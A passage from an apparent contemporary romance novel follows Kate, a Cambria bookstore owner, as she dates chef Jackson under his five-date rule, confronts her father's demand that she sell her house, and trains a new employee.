"But Jackson!" Kate said. "Oh my God. It's like I'm sixteen again with the raging hormones, and the _urgency_ , and the feeling that the world's just going to freaking _end_ right now, today, if I can't get him into bed. You know?" She popped the California roll into her mouth.
"I wish," Gen murmured.
"God, sixteen," Lacy said dreamily. "I remember that. Steven Ford. Prom night." She shuddered happily at the memory.
"Steven Ford?" Rose piped in. "Steve from the bank?"
"Oh, yeah," Lacy said. "He wasn't always so... paunchy."
"Let's get back to me and my pent-up sexual tension," Kate said.
"Okay, let's," Gen agreed. "So, he's withholding sex for five dates."
"Well, it sounds bad when you say it like that," Kate said.
The restaurant, in the bottom floor of what was once a Victorian house, was half-filled with a mix of locals and tourists. Kitschy décor, including paper lanterns and a giant Buddha, contrasted with the cozy feel of the low ceilings, the chair railings, the fireplace on one wall, the squeaky wood floors and the small doorways.
Lacy picked up a piece of raw salmon and considered Kate. "Okay, let's rephrase it then. He's taking a traditional, respectful approach to the first five dates."
"Better," Kate said. "But, yes. That's the deal. I may have kind of, I don't know"—she waved her chopsticks around, considering how to say it—"issued a sort of challenge."
"A challenge?" Gen looked at her curiously.
"What kind of challenge?" Rose asked.
Kate shrugged. "I might have suggested, in a kind of playful way, that he might not make it to Date Five."
"Oh, boy," Lacy said. She chewed thoughtfully on the salmon. "That makes things interesting."
"It does," Gen agreed.
"Sort of sounds like you're planning to ring his bell before the end of the round," Rose said. "So to speak."
"Oh, I don't know." Kate toyed with her pile of white rice, thinking. "I mean, it's really sweet and kind of flattering that he wants to treat me differently from all his other women. And, jeez, there are a lot of other women."
"Well, we knew that," Lacy said.
"Sure," Kate said. "But knowing that is one thing. Running into them out in the world when I'm with Jackson is another. Did I tell you about Melanie?" She said the name in a high, mocking voice, the way she might have if the name had been Bitsy or Muffy.
"Melanie Taylor?" Rose inquired. "I heard they used to have a thing."
"Right." Kate pointed a chopstick at Rose. "She propositioned him while I was standing right there!"
Rose gaped at her. "Really? Could you have misinterpreted something?"
Kate batted her eyelashes and did her Melanie voice. " 'Oh, Jackson. When you're finished with _her_ , give me a call.' " She batted the lashes again.
Lacy let out a guffaw. "Well, that took some lady balls."
"No kidding," Kate agreed.
"So, what's your plan to seduce him before Date Five?" Gen asked, leaning forward eagerly. "Do tell. I'm having a dry spell. I have to live vicariously."
Kate slumped a bit, feeling grumpy. "I don't know. I might have an idea if my father and Angela would get out of my house. It's kind of hard to lure a guy into my bed when my father's already in it."
"Ooh." Rose waved her hands in front of her face. "Now I need brain bleach."
"That is a problem," Gen agreed. "So, what _are_ you going to do about your dad? Has he said when he's leaving?"
"Oh, honey," Lacy said sympathetically. "With _your_ dad, that could only mean one thing."
"He lost his condo and he has nowhere to go? I've already thought of that," Kate said.
"All that and you can't even get laid," Gen said.
"We'll see about that," Kate said, picking up her glass of wine.
The whole cold shower thing was overrated, in Jackson's opinion. It didn't work. It didn't stop him from thinking about sex, all the time. Specifically, sex with Kate.
This was different than what he'd experienced with other women. You met people, you liked the way they looked. You had an itch, you scratched it. Everybody was happy. Well, the women didn't usually stay happy once the fun was over and they had to live with him on a day-to-day basis. But still.
Sex, and thinking about sex, was great, but it usually didn't interfere with his daily life. Usually, he could compartmentalize. Sex was one thing, work was another. Even when he'd slept with someone he was working with—not an infrequent occasion—he was able to put all that aside and focus on his job.
But this was different. Not since his adolescent obsession with Debra Ferguson when he was in twelfth grade had he been this preoccupied with a female.
The kitchen staff at Neptune probably knew something was up, though they couldn't know what. Jackson was off his game, forgetting things, burning things and then having to redo them. But the most conspicuous red flag was the fact that he wasn't yelling. Jose at the fish station sent out some undercooked salmon, and a server brought it back, and Jackson barely quirked an eyebrow.
He was distracted, unfocused. And he had sharp knives in his hands.
"Jackson? You okay, man?" Esteban, the salad guy, put a hand on Jackson's back.
"What?" Jackson looked up at him like he'd barely heard.
Yeah, he was fucked.
The five-date thing had been his idea, and right now it seemed like a stupid one. She'd wanted to go back to his apartment. She'd said _please_ , for Christ's sake. And he'd responded with his wussy _let's do this the right way_ bullshit.
He'd wanted to show his respect for her.
Well, respect was going to get him burned or cut if he couldn't get his head in the game.
"I'm good," he told Esteban. "Yeah, I'm good."
He was going to have to fire somebody or throw something pretty soon, just to prove it.
Kate decided it was time for a come-to-Jesus talk with her father. He and Angela had been in Kate's house for almost two weeks, with no indication of when they might leave. Kate was tired of sleeping with Gen, tired of not having access to her bedroom, her things. Tired of leaving the house every day with a face full of Mary Kay makeup that was definitely not her style.
And she really wanted them out before her fifth date with Jackson. His apartment was probably great and would likely serve their needs just fine. But she wanted options.
She wanted her damned house back, and she wanted her father and stepmother safely back in Los Angeles where she couldn't suddenly snap and kill them.
Which was always a possibility.
"Hey, Dad?" She approached him as he was sitting at the dining table drinking coffee and reading the morning newspaper. He was the only person she knew who still read a newspaper instead of getting news on the Internet. It was early, and he was still wearing his bathrobe—a navy blue velour number with his monogram on the pocket. Angela was out walking Jazzy—walking apparently was good for Angela's sciatica—which gave Kate a window of opportunity.
"Hmm?" He raised his eyebrows to show he was listening, but didn't look up from the paper.
"Can we talk for a minute?" Her pulse sped up, and she realized she was nervous about talking to her own father in her own house. Ridiculous.
"Sure, honey."
She sat down in the chair across from him and began carefully. "I just thought we should discuss your plans."
"Ah. Well, today I thought Angela and I would visit Hearst Castle. Looks like it's going to be a beautiful day for it. Would you like to join us?"
She cleared her throat. "Thanks, but I have to work. See, I didn't mean your plans for today. I meant your plans for when you thought you might go... you know. Back to Los Angeles."
He looked at her blankly.
"It's just, this house is really small," she said.
His expression perked up, and he folded the newspaper and set it down. "It's small, but the location is prime. Did you know your property values have soared over the last couple of years? What with the water issues in Cambria—the de facto moratorium on new construction because of the drought—existing homes near the beach might as well be made of gold. Have you ever thought of selling?"
The conversation had taken a turn she hadn't expected.
"You just said the house is too small. Why, you could sell, make a huge profit, and buy a much bigger place inland for less than what you make on the sale. You could have a bigger house and a nice savings account."
He looked at her expectantly, as though she might bubble over with excitement at his idea.
"I don't want to sell my house," she said.
"It's worth more than six hundred thousand on Zillow. For a two-bedroom!" he said excitedly.
"Wait a minute. You looked up the value of my house on Zillow?"
He avoided her gaze, fussing with the paper and the coffee cup. "Well, I... "
"Why were you looking up the value of my house?"
He took a deep breath, entwined his fingers in front of him, and said, "Kate, since you asked, I think it's time we talked about this house."
"What about it?"
"As you know, Angela and I have had some financial problems. A couple of investments that didn't go the way we wanted, the foreclosure."
"Foreclosure?" This was the first she was hearing of it. "You never... "
"And the thing is," he went on as though she'd never spoken, "I never would have been in such a bind in the first place if it hadn't been for the divorce settlement I had to pay to your mother." He spread his hands plaintively. "It was excessive, the settlement, especially considering we had no minor children."
"So you're blaming Mom for your money troubles?" Her face was starting to feel hot, and she could hear her pulse pounding in her ears. "She's not the one who wanted the divorce. You were."
"Of course. Of course. But... "
"She'd have stayed forever. She'd have... "
"Kate." He looked at her with the calm, piercing gaze he used when he wanted to dominate an argument. "You can't know what went on in our marriage. No child can ever know what happens in private between her parents."
"Okay." She took a deep breath and tried to calm herself.
"What I'm saying is," he went on, "ultimately, most of the settlement she received from me went into this." He spread his hands to indicate the house surrounding them.
"My house."
"And since the settlement was unfair to begin with... "
"Wait. Oh, wait." She was starting to get it. It was all starting to come clear. And the picture that was forming was enough to make her blood rush to her head, make her see red. "You want me to sell the house and give you the money?"
"No, no." He shook his head. "Not all of it."
"But some of it."
The little smile on his face was that one that said, _You're being irrational but I'm humoring you._ "Just enough to get me back on my feet, Kate. It's only fair."
"What about all of the money I've given you over the years? All of the loans you've never paid back?" Her voice was rising. "What about that, Dad? What about the fact that this is _my goddamned house_ , and I'm not going to sell it and give the _goddamned profits_ to _you!_ " She was standing now, the force of her outrage having propelled her to her feet.
Her father, still calm, shook his head sadly. "I knew you'd react this way."
"Why?" Kate demanded. "Because I'm _sane?_ "
"I was afraid you wouldn't be able to see reason," he said.
"You're so emotional about anything that has to do with your mother," he said, as though that were a great and terrible character flaw.
With sudden clarity, Kate could see that this, right here—this man sitting at her table and his way of manipulating her—was the root of her problems with men. When he wanted something unreasonable and she didn't want to give in, he spun the situation to make it look like she was irrational, overly emotional, inherently damaged and stunted. Was it any wonder she'd married a man who had treated her the same way? She knew what was happening—knew exactly what he was doing—but just as she hadn't been able to leave Marcus, she couldn't seem to detach completely from her father, either. She was angry with him, but she was angry with herself, too, for letting herself be treated this way.
"You know what?" Kate said, rising from her seat at the table. "I think your vacation's over. I need you and Angela to pack up and go."
He sighed and did the sad head shake again. "As I was just explaining to you, we had to give up our condo. We're between addresses."
"If _between addresses_ means you're homeless, that's not my problem. I need you to go. I want my bedroom back. I want my house back." Her anger was like a heavy, hot weight on her chest.
He picked up the newspaper and began reading again. "As soon as we find another place to stay. Perhaps something here in Cambria, hmm?" He turned to the sports page and sipped his coffee.
All that day at work, Kate obsessed over her father and what to do about him. When she'd told him to leave, it was as though he hadn't heard her. That patronizing smirk he'd given her was the same one he'd used on Kate's mother while Kate was growing up. Kate wondered how her mother hadn't suffocated him in his sleep.
While her outburst at him had been cathartic, she was no closer to getting him out of her house. How could she get him to leave if he refused to go? If Jackson were in this position, he'd probably have picked him up and physically put him on the street by now. Too bad Kate didn't have that kind of upper body strength.
She tried to put thoughts of her father aside, and focused on training Fury at the store. The kid was good. He paid attention and learned fast, and he had some creative ideas. Early that morning, she'd sent him to write a two-for-one promotion on the blackboard that stood on the sidewalk outside the store. He'd taken longer than she expected, then beckoned her to come and look. He'd drawn a charming picture of a pigtailed girl in a chair absorbed in a book, and in careful script, he'd written, _Tell us the first line of your favorite book and get two for the price of one!_
"First line of your favorite book," Kate said thoughtfully.
"Yeah. I thought it would be fun. Get people in the door."
She nodded. "Okay. Let's see how it works."
Now, by lunchtime, they'd heard "Call me Ishmael," "It was the best of times, it was the worst of times," "In a hole in the ground there lived a hobbit," and, from a tiny girl, "The sun did not shine, it was too wet to play."
When a middle-aged man came in and offered, "Once upon a time and a very good time it was there was a moocow coming down along the road," Fury scowled and said, " _Portrait of the Artist?_ Dude, that is _not_ your favorite book. That's not _anybody's_ favorite book!" And the two had gotten into a lively discussion about literature for entertainment versus intellectual enlightenment.
He had some good ideas for Art Walk, too. He'd suggested a contest: He or Kate would read a paragraph from an unnamed book, and the first audience member to name the book would win it. There could be age divisions: adult, young adult, and children.
"Hmm," Kate considered. "If they know the book well enough to name it, they probably already have it."
"Doesn't matter," Fury said. "Everybody loves to win things."
"That's true," she said.
Within a couple of days she felt comfortable leaving him alone in the store during her lunch breaks. That allowed her to slip out to have a salad with Rose, or to do some quick shopping in the boutiques on Main Street—things she'd been missing since Althea's departure.
Something else she missed was Jane Austen. Every time Kate looked at Jane Austen's empty bed, she felt a sad little tug in her chest. It wasn't just the fact that she didn't have the cat to keep her company in the store, though that was a factor. She was also bothered—more so than she would have expected—by how the cat's absence reminded her of her own lack of assertiveness. Why had she let Althea take the Swept Away cat? Who did Althea think she was? Was Jane Austen happy at Althea's house? Did she miss the attention she got at the bookstore, the customers stroking her and cooing soft words into her ears?
Kate considered getting another cat, but she knew it wouldn't be the same. You couldn't just replace a pet the way you'd replace a broken lamp or a lost set of keys. She was used to Jane Austen, was comforted by her presence and her quirks.
"You could get a snake," Fury suggested when he saw Kate gazing sadly at Jane Austen's empty food and water bowls, now stacked on a shelf in the back room.
"A snake?" Kate asked.
"Sure. I had a boa constrictor when I was in high school. I thought it would impress girls."
She looked at him, amused. "Did it?"
"Not really. Girls are too sympathetic."
She looked at him questioningly.
"Live feedings," he said. "Mice, usually. Marcy Ellison cried and called me a murderer."
"Might not be the best thing for the store, after all," he said.
# 17
Sunday nights at Neptune tended to be moderately busy during the summer tourist season. The crowds of out-of-towners in cargo shorts, souvenir T-shirts and flip-flops, staying until Monday to make a long weekend, congregated in groups of four to six outside the restaurant's front doors, making him long for the days—far in the past—when elegant dining meant you put on a coat and tie. Where was the respect for the food, for the ambiance, for the artistry that went into each plate that left the kitchen? But this was a beach town, you had to remember that. And tourists paid the bills.
Jackson had been going hard since early in the morning, meeting with his produce supplier, talking to the fish guy about why there was no goddamned fresh crab, tweaking the menu for the coming week, working with the prep crew. Now he was in the middle of it, in the heat and the steam and the bustle of the kitchen during the height of dinner service.
This was when he came alive, when he truly felt like himself. Something about the creative act of cooking, combined with the rush of doing it for hundreds of people in a night, made him forget everything else. The laser-like focus the job required pushed out the static and the noise of all of his petty problems, and that was therapeutic. Meditative.
Even when he lost his shit over some dumbass mistake made by someone in his crew—a daily occurrence—it was all a part of the whole, a part of the high-tension team effort to feed people not just well, but with excellence. It was part of the rhythm, like ballet. Like performing a piano concerto.
Around seven thirty, when he was right in the middle of his stride, in the middle of the zone, he noticed something odd about a ticket Janie had brought in.
"Janie, is this right?" He held the ticket in front of him, peering at her scratchy handwriting.
"Which part?"
"At Table Twelve, one guy, two appetizers?"
She nodded. "Yep."
Could be nothing, but it raised an alarm bell. When the same single diner at Table Twelve also ordered two entrees, Jackson knew the guy wasn't just especially hungry. The guy was a food critic. He had to be. People rarely dined alone, and when they did, they didn't order enough to feed an army—unless they wanted to sample an array of menu items.
Gavin Hughes, the restaurant's owner, noticed about the same time Jackson did. He popped into the kitchen and made a quick stop to talk to Jackson.
"Table Twelve?" he said.
"Yeah, I got it," Jackson told him. "Guy's gotta be a critic."
"I don't recognize him," Gavin said.
"Yeah, well, we better assume he is. Jose!" Jackson yelled to his sous chef, who was busy searing some bacon-wrapped filets.
"Yes, chef!"
Jackson went over and told Jose—a short, compact, middle-aged man of boundless energy whom Jackson had come to think of as his right hand—about his suspicions regarding Table Twelve.
"... And nothing goes out until I see it. Got that? Do not fuck this up." He gave Jose a friendly, encouraging smack on the back and went to work on the seafood portion of Table Twelve's meal.
* * *
Two nights after the Table Twelve triumph—and Jackson knew it was a triumph when Janie reported to him that the guy had eaten with obvious pleasure and gusto—Jackson and Kate had their third date, which was dinner at Jackson's apartment.
Kate was surprised he'd invited her there, since it presented a threat to his plan to stay abstinent for five dates. With the chemistry between them, what were the odds that they'd be able to keep their hands off each other in a private, relatively comfortable environment?
Kate wore her good underwear and shaved her legs, just in case.
Jackson's apartment was on the second floor of a big brick building about a mile down Main Street from the bookstore. The first floor housed Neptune—an arrangement that probably made Jackson even more of a workaholic than he otherwise would have been. The building was a boxy, imposing structure that had once been a bank, with an outside staircase leading to Jackson's door.
She knocked on his door at six p.m. on a Tuesday—the restaurant's slowest day—wearing a silky red top, a strappy pair of sandals, and jeans that made her ass look great. At least, Gen said they made her ass look great. But who knew? Friends had to compliment your ass before a date—it's what they were there for.
He opened the door dressed in Levi's and a button-down shirt left untucked, his feet bare, hair combed back from his face. He leaned in for a hello kiss, and he smelled like soap, mouthwash, and essence of Jackson Graham.
"Come on in." He took her hand and brought her inside.
The bones of the apartment were appealing. Hardwood floors, white walls with crown moldings, plenty of windows letting in natural light, even a fireplace with an elaborately carved surround. But the décor was in the style of workaholic man, with little in the place to indicate that someone considered it home. He had a sofa that had probably come from a thrift store or from a friend's garage, a big-screen TV, some side tables, some lamps, a small dining table and chairs, and not much else. The expanse of floor was unbroken by any sign of a rug, and the walls were bare except for the mounted TV.
The kitchen, though, was different, as Kate might have expected. It was too small for professional-quality appliances, but she could see at a glance that it was stocked with gleaming stainless steel pots and pans and knives that probably cost more than her car.
"This is an interesting place," she said, looking around. She gestured toward the sparse living area. "Did you just move in?"
He looked confused. "What? No. I've been here three years. Why?"
She raised her eyebrows at him. "Most people would have bought a rug by now, that's all."
He shrugged. "I don't spend much time at home."
"I gathered."
He went to the kitchen, poured a glass of chilled white wine, and handed it to her. The taste was crisp, with a hint of apple.
"Even when I try to spend time at home," he went on, "it doesn't usually work out. Some kind of crisis downstairs, and I'll have a sous chef banging on my door. Which is not going to happen tonight. I told them not to bother me unless the building's on fire. And even then, it better be a fire they can't put out on their own." He picked up a chef's knife. "You want to sit down and make yourself comfortable while I get things ready?"
"I can keep you company in the kitchen," she said.
He started slicing vegetables—some zucchini and mushrooms—and she was fascinated by his fluid, practiced motions, his speed, as though the knife were an extension of his hand.
"Wow," she said.
"Nothing fancy," he told her. "Just a simple stir-fry."
"Still," she said.
They chatted about his day—he'd worked a little at the restaurant in the morning and then went jogging with Daniel—her day, her plans for Art Walk, the catering jobs he had coming up. As he continued to cook, she took her glass of wine and wandered around the apartment. Though he had no homey touches, he did have books—a dark, hefty bookcase full of books. She perused the titles and found her own, _Beyond the Boundaries of Desire._ She wondered at first if he'd gotten it just to impress her, but noticed that the pages looked well-worn and dog-eared.
"Do you usually bring women here?" she asked impulsively. She didn't know why she'd said it. She didn't want to put him on the defensive about his history with women. She just wanted to know.
"Never," he said.
Her eyebrows shot up. "Really? Never?"
"Never." He carried two steaming plates of stir-fry to the table, which had been set before her arrival. "You're the first."
"I'm the _first?_ " It didn't seem credible, considering how prolific he was with women, but on the other hand, a glance around said it was true. This wasn't a place he'd created to impress his dates. This was just where he slept, where he kept his things.
The stir-fry was delicious—she would have expected no less—and she made happy noises as she savored the first bite. "Oh, God," she said. "This is fabulous. What's that flavor?"
"It's probably the fresh ginger."
"Oh, wow. Yeah. And I like how it's got a little kick, but not too much."
"It's not hard. I can teach you to make it."
She grinned. "That would be good, since our last cooking lesson was cut short."
"Well... " He fidgeted.
She changed the subject to let him off the hook. "So, you said you're from the Bay Area. San Francisco?"
He took a sip of his wine and shook his head. "No. Oakland."
"How was that?"
He shrugged. "My dad was a dock worker at the port, my mom was a nurse at the children's hospital. They worked hard, but never got much to show for it. Public schools in Oakland aren't the best, so I learned to keep my head down, try not to be noticed."
"Do they still live there?"
He nodded. "Yeah, same house. My dad's retired—you can't do that kind of work forever—but my mom's still nursing. A city like that, she sees a lot of rough things at the hospital. Shootings, drug overdoses, domestic violence. And this is all kids." He shook his head, his mouth set in a grim line. "She used to say, 'Jackson, you get your education and get out of here as soon as you can.' And that's what I did. I offered to bring them down here, but they said no. Home is home, I guess."
"I guess it is." She thought about mothers and fathers, and what it would be like to still have both of hers in a place she could think of as home. "This is my home now," she said. "Though it took a while for anywhere to seem like home after I lost my mom. She was it. She was home. Now I have to be that for myself."
"I hear people talk about her sometimes," he said thoughtfully. "Your mom, I mean. Here in Cambria. All good things. People miss her."
The thought of that collective memory, that joining together of people who knew her, made Kate feel warm inside. She smiled. "That's good to know."
"Speaking of parents... " He asked her what was going on with her father, and she told him the short version.
"He needs money. Again. Apparently, his condo has been foreclosed, and he and Angela have nowhere to live. So... " She took a deep breath. "He wants me to sell my house and give him the money—not all of it, he says, oh so generously—but enough to get him 'back on his feet.' Says I owe it to him because the divorce settlement was unfair."
He stared at her. "Jesus."
"Even _he_ would be pissed with my father right now," Kate said.
Jackson set down his fork. "Please, for the love of all that is holy, tell me that you're not thinking of doing it."
"Oh, God no. That house... it's more than a house. It means a lot to me. It's... "
"It's a connection to your mother," he supplied.
"Yes. It is. There's no way I'm selling it, not for him, not for anyone. I told him that. But when I talk, he doesn't seem to hear me. I told him he needed to leave, and he said, 'As soon as we find somewhere else to stay.' Which, considering how hard he's looking, could be never."
"You need to make him leave."
"But how... "
She looked at him.
"You need to make him leave," he said.
"He's my dad," she said. She sighed, and looked down into her wine glass. "I wish I knew how to be more assertive with people. I don't like being a doormat. I guess somewhere down deep I think that if I act the right way with him, he'll really see me—he'll appreciate me for who I am. But it never happens." She looked at Jackson. "How do you do it?"
"Do what?"
"Well..." She shifted in her chair, thinking of how to say it. "You never take any crap off of anyone. You don't seem to care what anybody thinks. If someone needs to have their ass handed to them, you just..." She gestured with her hand. "You just do it."
He got up, went to the kitchen, and retrieved the bottle of wine they'd started. He poured more for both of them, sat down, and folded his arms on top of the table. "Kate. I never told you how I ended up going to culinary school."
"No, you didn't," she said, puzzled by the abrupt change of topic.
"Well. As I mentioned, my parents were struggling financially, and as you might be aware, culinary school—especially one in San Francisco—costs an absurd amount of money."
He took a deep breath before going on. "I paid for it with the settlement from a very bad car accident I was in."
"Jackson... " She could see that the story was hard for him to tell, that this was going to be a story that mattered. She reached out a hand toward him, and he took it in his.
"I was in the car with a guy I knew from high school. Not a close friend, just a guy I hung out with. You know how it is. Anyway, we'd both been drinking. Not a huge amount, we weren't shitfaced. But we probably shouldn't have been in the car."
He kept his eyes on the table, avoiding her gaze, as he continued.
"He was driving. We were on a two-lane road, late. Some fog on the ground, so it was hard to see. The guy in the other lane swerved into ours, hit us head-on, with the main impact on the driver's side of the car." He rubbed the back of her hand gently with his thumb as he continued. "I had my seatbelt on, he didn't."
"Oh, Jackson." She knew what was going to come next, and she braced herself for it.
"My friend—a guy named Logan Walsh—was killed on impact. I was in the hospital for a while, a concussion, some broken bones and whatnot."
He paused, collecting his thoughts, before he finished.
"Even though the accident wasn't Logan's fault, I could never help wondering what would have happened if he'd been completely sober. Would he have seen the guy coming? Would he have been able to swerve out of the way in time?" He shook his head. "I will never—and I mean ever—forget the way his mother screamed when she got to the hospital and they told her he was gone. And I _knew_ he shouldn't have been driving. I _knew_ it. But I was too big of a pussy to say anything. Didn't want him to be mad at me." He looked disgusted with himself.
"How awful," Kate said. But she knew there really wasn't anything to say.
"Yeah. Anyway. My point is, that was about the time I decided that I was never going to hold back what I thought about things again. People think I'm an asshole... "
She started to protest, and he gave her a wry grin.
"Don't argue," he said. "They do. But that's okay. That's fine. If that's how it's got to be, that's how it's got to be. Because I'm never holding my tongue again about anything that matters." He laughed lightly. "Though, maybe I've got to learn to hold it more often about stuff that doesn't matter."
She considered that. "You said you never hold back what you think. But you also said you've had a thing for me for a while now. You kept that secret pretty well." She smiled at him playfully.
"Yeah, well... "
"Why didn't you tell me sooner how you felt?" She was curious, but she also was grasping for some clue that would tell her what this all meant, where they were going, whether she would be just another in his long line of not conquests, precisely—she could see he wasn't like that—but perhaps serial efforts to find connection and meaning.
"I didn't think I had a chance with you," he said.
She raised her eyebrows, surprised. "Why not?"
He shrugged. "You're very together. You're beautiful. You're a serious person. I'm... Well. I'm still trying to figure out what the hell I'm doing."
She stood up from the table and reached out a hand to him. He took it, stood up, and enfolded her in his arms.
"Seems to me like you're doing okay," she said.
"I'm working on it."
# 18
Gen was starting to lose patience with sharing her bed. She was a doll about it, of course—Kate would have expected no less from her best friend—but there was a certain crankiness in the mornings, a certain resigned acceptance when Kate came home at night, that told Kate she'd better figure something else out soon.
It didn't help that Kate had become a restless sleeper. Since Jackson. Since she'd regularly begun going to bed at night having been with him, or having spoken to him on the phone, without the benefit of sweet, sleep-inducing sex. He was sticking to his five-date plan, despite Kate's efforts to persuade him otherwise on his couch on Date Three. His self-control was maddening. And hers was at its breaking point.
The sexual frustration was becoming harder and harder to live with, and it usually resulted in Kate thrashing around at night, trying to sleep, but failing.
The night after the third date, Gen flipped the light on at two a.m., bleary-eyed and irritated. "Oh, for God's sake," she said. "Just screw the man already!"
"I want to," Kate said, groaning and pulling a pillow over her face. "He won't do it! Shit, I'm like a seventeen-year-old boy trying to persuade his virgin girlfriend to put out. 'You'd do it for me if you loved me.' Ugh!"
"I thought it was cute at first," Gen said. "But the whole not-sleeping thing? Less cute."
"I know. I'm sorry. This whole thing with my dad... You're putting up with a lot. Have I told you what a great friend you are?"
"You have. But tell me again."
Kate sat up and looked seriously at Gen. "You are. You really are. You're a great friend. And I'll figure something out soon. I'll fix all of this. I promise."
Gen flopped back onto her pillows. "Soon, okay? I'm getting unsightly circles under my eyes."
"You are not."
"But you are."
Kate sat up straight, alarmed. "Am I?" She got up and went to the bathroom, turned on the light, and peered into the mirror. "Oh, God. I am."
"I know what'll cure that."
"What?" Kate poked her head out of the bathroom to listen.
"Sex. And then sleep."
In the final run-up to Art Walk, both Kate and Jackson were busy with preparations—her for the event at the store, him with catering jobs for the big night—and so they were not able to dispense with Date Four and get down to business as quickly as they might have liked. She was swamped with work during the day, he couldn't get away from the restaurant in the evenings.
They talked on the phone, texted, and emailed a lot, but it wasn't getting the job done for either of them.
"We have to do Date Four, so we can do Date Five! The all-important Date Five!" Kate told Jackson on her cell phone during a lull at the store. "Do not make me wait any longer than I have to for Date Five, Jackson. I might have to kill you."
He let out a low, seductive laugh that made the blood rush straight to the body parts she was trying to forget. "Who said Date Five was the all-important one? I thought we'd agreed to hold out until _after_ Date Five. Which means the all-important stuff will happen on Date Six."
"Six?" Kate sputtered. "But that's... I... You..."
He laughed at her again, his voice a deep purr. "I'm joking," he said. "It's Date Five. It's definitely Date Five."
"If I haven't already evaporated into a puff of frustration and broken dreams," she said.
His voice was serious now. "Jesus. It's so sexy that you want this as much as I do. There's something to be said for waiting like this."
"Not much," she said. "Gen hasn't slept in a week."
"I'll explain another time," she said. "The point is, we've got to get this show rolling. When are we having goddamned Date Four?"
" 'Goddamned Date Four,' " he echoed. "That has a nice ring to it."
"When?" she demanded.
"Hmm. I'm working every night until Art Walk. But I've got a window of time Tuesday afternoon. Can you get away?"
"I work Tuesday afternoon."
"How about the new guy at the store? Can he handle it for a couple of hours? We could... I don't know. Drive down to Morro Bay and see an early movie."
"That works."
"Anything you want to see?" he asked.
"Whatever will get us to Date Five."
In the last days before Art Walk, Kate worked with Fury to prepare for the store's event. They ordered folding chairs for their guests. They couldn't get catering from Neptune, which was all booked up, so they arranged for a place down in Morro Bay to bring a selection of canapes and beverages. They double-checked with Cassidy McLean to make sure she was still free and that she hadn't forgotten. Kate discussed with Cassidy what she would talk about during her presentation—and did some research on ring-tailed lemurs to make sure she wasn't inviting some crazed wild beast into her store that would terrorize the guests. Once she was satisfied that the lemur would do little more than climb around on Cassidy and look cute, she checked on whether she would need to provide anything for the animal. Cassidy assured her she'd bring everything Samantha needed.
That left advertising and cleaning the store. She and Fury put out flyers about Cassidy's appearance, put notices about the event on the store's website, and hung a sign in the front window. The success of the event would not rely on advertising, though. The nature of Art Walk was that everyone—locals and tourists—would be out on Main Street, walking from venue to venue and discovering things as they went. People who didn't know about the Swept Away event would stumble upon it. Cassidy had agreed to give her presentation twice that evening to accommodate those who trickled in at different times.
By Tuesday, Kate felt that she had enough of a handle on things to turn the store over to Fury to free her up for Date Four.
That didn't stop her from fussing around with him, though.
"Are you sure it's okay for me to go?" she asked, already gathering up her purse and her other belongings.
"Sure. It's no problem. Go." He bobbed his head in the affirmative.
"I know you've taken over during my lunch breaks, but this will be longer."
"Right. Movies usually last longer than lunch."
"Is that sarcasm?" She raised an eyebrow at him.
"Dude. Go. Have your date. I'm fine."
"When I go on lunch breaks, I'm right here in town. If you need anything, you can call and I can come back. This time... "
"You'll be farther away."
"I'm not gonna burn down the store or anything. I'm not gonna invite my friends in here to party." He rolled his eyes at her.
"I hadn't thought about that last scenario. It concerns me that you did."
He placed his hands on her back and gently pushed her toward the door. "You're gonna be late if you don't get going."
"But... "
"You're gonna miss the previews. It sucks when you miss the previews."
He finally got her out the door, and she met Jackson at Neptune for the drive down to Morro Bay. She let the hostess know she was there, and in a few minutes, Jackson came out of the kitchen, removing his chef's coat and smiling when he saw her.
The sight of him, the smile, the way the look in his eyes warmed for her, made something small and gentle hum inside her belly. He took her hand, and she felt a sense of rightness, of belonging.
"Should we go?" he said.
"Absolutely." She turned her face toward him, and he kissed her. He tasted like comfort and promise. She'd been wrong about Date Four: It wasn't something to be dispensed with. A few hours of Jackson in the middle of her day was a gift worth savoring.
Traffic was light, and the drive down to Morro Bay took about half an hour. Everyone in Cambria was so familiar with the drive they could have done it blindfolded. While part of Cambria's charm was that it lacked chain restaurants, drive-throughs, and many of the other establishments that stole a town's character and made it look just like everywhere else, there were times when you just wanted to shop at a well-equipped grocery store or get a Starbucks Frappuccino. Or see a movie.
The day was bright and clear, and Jackson seemed to be in a good mood. He hummed whatever tune was playing in his head, tapping out the beat on the steering wheel as he drove.
"You seem happy," Kate told him.
"I'm with you," he said simply. His response made her grin like an idiot.
The only movie theater in town was a one-screen place that had been open since 1942. It had been updated in the interim, no doubt, but it retained a feeling of nostalgia, of grandeur, and it evoked the spirit of the thousands of helpings of sticky fake butter and spilled sodas that had gone before. Because there was only one screen, Kate and Jackson had no options regarding what they would watch. The sole offering was an action-adventure flick that, they learned with dismay, had garnered only a ten percent rating on Rotten Tomatoes; the name of the movie was adorned on the website with an ugly green splat.
"Well, that doesn't look promising," Jackson said. "We could do something else."
"I think we should see it," Kate said.
He looked at her doubtfully. "Really?"
"Sure. It'll be fun. We can heckle. Have you ever seen _Mystery Science Theater 3000?_ "
"Sure," he said. "But I'm surprised you have."
She punched him playfully on the shoulder. "Come on. Let's get our tickets."
Even the woman manning the box office seemed surprised that anyone wanted to see the film. They got their tickets and went inside, inhaling the smell of stale popcorn and oily hair.
"This place is great. I love this place," Kate said.
"Snacks?" Jackson said.
"Absolutely," Kate replied with enthusiasm.
"Popcorn?" he said.
They both peered uncertainly into the bin containing artificially yellow popcorn that might have been there since the night before, or might have been there through the eons, predating the opening of the theater and even the dawn of motion pictures themselves.
"Better stick with the candy," Kate said.
They bought boxes of candy and giant bathtub-sized vessels of soda from a pimpled kid who looked like he'd just smoked a joint in the men's room. Then they hauled their purchases into the theater and looked around for a seat.
"Where's everybody else?" Kate said.
"Huh. I guess we're it," Jackson said.
The theater was vast, the kind that had filled up completely only for the blockbuster movies of their youth, like Titanic and Jurassic Park. They maneuvered halfway down the aisle and found two center seats.
"Do you suppose anybody else is going to come?" Jackson asked.
"I hope not," Kate said, snuggling down into her seat. "This is kind of great." She opened her box of candy and popped some into her mouth. "God, Jujubes. I haven't had these since I was twelve. These are the flavor of youth and joy, right here." She washed the candy down with a giant slurp of Coke.
When she looked up at him, he was gazing at her with a lopsided smile on his face.
"What?" she said.
He shrugged. "I just like the uncomplicated happiness you're getting from this. Most women would be pissed if I brought them here."
She nudged him with an elbow. "I'm not most women."
"Yeah, I'm getting that," he said.
When it was time for the movie to start, the theater went dark and the sound erupted with a thunderous boom. Had they made movies louder since Kate was young, or did she just remember it that way? She was certain her ears would be ringing when she left here in two hours.
